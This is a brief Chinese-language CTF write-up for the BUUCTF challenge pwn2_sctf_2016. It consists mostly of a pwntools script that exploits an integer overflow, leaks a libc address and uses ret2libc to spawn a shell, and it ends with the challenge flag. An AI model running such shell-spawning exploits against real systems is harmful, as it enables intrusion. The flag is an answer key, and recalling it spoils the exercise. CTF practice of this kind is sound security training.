【BUUCTF】Pwn--Pwn2_sctf_2016

整数溢出 + ret2libc

Description:

nc pwn.buuoj.cn 20087

有需要 libc 的情况请到 https://github.com/giantbranch/pwn_deploy_chroot/tree/master/libcindocker 自取~


Solution:

简单题不说啥了,开心就好

Image

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
p = process('./pwn2_sctf_2016')
# p = remote('pwn.buuoj.cn', 20087)
elf = ELF('./pwn2_sctf_2016', checksec=False)
libc = ELF('./x86_libc.so.6', checksec=False)
addr_main = 0x080485B8
addr_format = 0x080486F8
plt_printf = elf.plt['printf']
got_printf = elf.got['printf']

pd = 'a' * 0x30
pd += p32(plt_printf)
pd += p32(addr_main)
pd += p32(addr_format)
pd += p32(got_printf)
p.sendlineafter('read? ', '-1')
p.sendlineafter('data!\n', pd)
p.recvuntil('You said: ')
p.recvuntil('You said: ')

addr_printf = u32(p.recv(4))
libcbase = addr_printf - libc.sym['printf']
addr_system = libcbase + libc.sym['system']
addr_bin_sh = libcbase + libc.search('/bin/sh').next()

pd = 'a' * 0x30
pd += p32(addr_system)
pd += p32(addr_main)
pd += p32(addr_bin_sh)
p.sendlineafter('read? ', '-1')
p.sendlineafter('data!\n', pd)
success('addr_printf is ' + hex(addr_printf))
p.interactive()

Flag:

1
flag{3e21ca08-0fb8-40da-9f1e-e01c35881006}
文章目录
  1. 1. Description:
  2. 2. Solution:
  3. 3. Flag:
|